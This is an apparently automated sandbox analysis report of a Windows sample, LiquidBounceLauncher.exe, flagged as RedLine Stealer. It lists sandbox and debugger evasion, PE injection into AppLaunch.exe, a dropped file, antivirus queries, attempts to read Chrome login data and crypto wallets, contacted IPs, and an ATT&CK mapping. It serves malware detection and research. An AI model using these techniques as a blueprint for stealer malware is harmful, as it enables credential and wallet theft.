                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6532Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 3432Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 4959Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeAPI coverage: 1.8 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00516EF0 GetSystemInfo,20_2_00516EF0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004291F0 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,0_2_004291F0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00428CA0 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,17_2_00428CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_005468A3 FindFirstFileExW,20_2_005468A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeAPI call chain: ExitProcess graph end nodegraph_0-25313
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeAPI call chain: ExitProcess graph end nodegraph_17-40588
                      Source: AppLaunch.exe, 00000004.00000002.354656742.0000000005521000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\]
                      Source: AppLaunch.exe, 00000004.00000002.360218389.000000000A3C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: AppLaunch.exe, 00000004.00000002.354787034.00000000055A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                      Source: AppLaunch.exe, 00000004.00000002.360218389.000000000A3C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware316SXOVTWin32_VideoControllerLN2T19VYVideoController120060621000000.000000-00011432646display.infMSBDAYL91XYF1PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsXPWFG3Y9S
                      Source: AppLaunch.exe, 00000004.00000002.354787034.00000000055A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: AppLaunch.exe, 00000004.00000002.354787034.00000000055A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_005463B8 IsDebuggerPresent,OutputDebugStringW,20_2_005463B8
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_00401340 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,atexit,0_2_00401340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_005481D0 GetProcessHeap,20_2_005481D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004B09BC mov eax, dword ptr fs:[00000030h]0_2_004B09BC
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004B09BC mov eax, dword ptr fs:[00000030h]0_2_004B09BC
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_00415EC4 mov eax, dword ptr fs:[00000030h]0_2_00415EC4
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_00415EC4 mov eax, dword ptr fs:[00000030h]0_2_00415EC4
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_00415EC4 mov eax, dword ptr fs:[00000030h]0_2_00415EC4
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004D234C mov eax, dword ptr fs:[00000030h]0_2_004D234C
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004B046C mov eax, dword ptr fs:[00000030h]17_2_004B046C
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004B046C mov eax, dword ptr fs:[00000030h]17_2_004B046C
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00415972 mov eax, dword ptr fs:[00000030h]17_2_00415972
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00415972 mov eax, dword ptr fs:[00000030h]17_2_00415972
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00415972 mov eax, dword ptr fs:[00000030h]17_2_00415972
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004DB430 mov eax, dword ptr fs:[00000030h]17_2_004DB430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00532010 mov eax, dword ptr fs:[00000030h]20_2_00532010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_005399F4 mov eax, dword ptr fs:[00000030h]20_2_005399F4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00542A60 mov eax, dword ptr fs:[00000030h]20_2_00542A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00542AD5 mov eax, dword ptr fs:[00000030h]20_2_00542AD5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00542AA4 mov eax, dword ptr fs:[00000030h]20_2_00542AA4
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004011B0 SetUnhandledExceptionFilter,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,0_2_004011B0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004011B0 SetUnhandledExceptionFilter,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,17_2_004011B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00535835 SetUnhandledExceptionFilter,20_2_00535835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0053521C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0053521C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00539503 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00539503
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_005356A2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_005356A2

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: FAF008Jump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 510000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 208008Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 510000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 510000 value starts with: 4D5AJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004D2381 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_004D2381
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Tempsvchost.exe "C:\Users\user\AppData\Local\Tempsvchost.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0041F7E0 cpuid 17_2_0041F7E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00541258 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,20_2_00541258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.LiquidBounceLauncher.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.LiquidBounceLauncher.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.LiquidBounceLauncher.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.263225019.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.353313209.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LiquidBounceLauncher.exe PID: 3368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 4616, type: MEMORYSTR
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 4616, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.LiquidBounceLauncher.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.LiquidBounceLauncher.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.LiquidBounceLauncher.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.263225019.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.353313209.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LiquidBounceLauncher.exe PID: 3368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 4616, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts221
                      Windows Management Instrumentation                      		Path Interception411
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools                      		LSASS Memory351
                      Security Software Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		Exfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion                      		Security Account Manager11
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Ingress Tool Transfer                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)411
                      Process Injection                      		NTDS241
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingData Transfer Size Limits3
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Software Packing                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem135
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632538 Sample: LiquidBounceLauncher.exe Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 4 other signatures 2->43 8 LiquidBounceLauncher.exe 1 2->8         started        process3 signatures4 53 Contains functionality to inject code into remote processes 8->53 55 Writes to foreign memory regions 8->55 57 Allocates memory in foreign processes 8->57 59 Injects a PE file into a foreign processes 8->59 11 AppLaunch.exe 15 7 8->11         started        16 WerFault.exe 23 9 8->16         started        18 conhost.exe 8->18         started        process5 dnsIp6 31 185.106.92.73, 34437, 49760 SUPERSERVERSDATACENTERRU Russian Federation 11->31 33 dl.uploadgram.me 176.9.247.226, 443, 49769 HETZNER-ASDE Germany 11->33 35 192.168.2.1 unknown unknown 11->35 29 C:\Users\user\AppData\Local\Tempsvchost.exe, PE32 11->29 dropped 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->61 63 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 11->63 65 Tries to harvest and steal browser information (history, passwords, etc) 11->65 67 Tries to steal Crypto Currency Wallets 11->67 20 Tempsvchost.exe 1 11->20         started        file7 signatures8 process9 signatures10 45 Multi AV Scanner detection for dropped file 20->45 47 Machine Learning detection for dropped file 20->47 49 Writes to foreign memory regions 20->49 51 2 other signatures 20->51 23 WerFault.exe 19 9 20->23         started        25 conhost.exe 20->25         started        27 AppLaunch.exe 20->27         started        process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      LiquidBounceLauncher.exe20%ReversingLabsWin32.Spyware.Convagent
                      LiquidBounceLauncher.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Tempsvchost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Tempsvchost.exe35%VirustotalBrowse

                      Unpacked PE Files

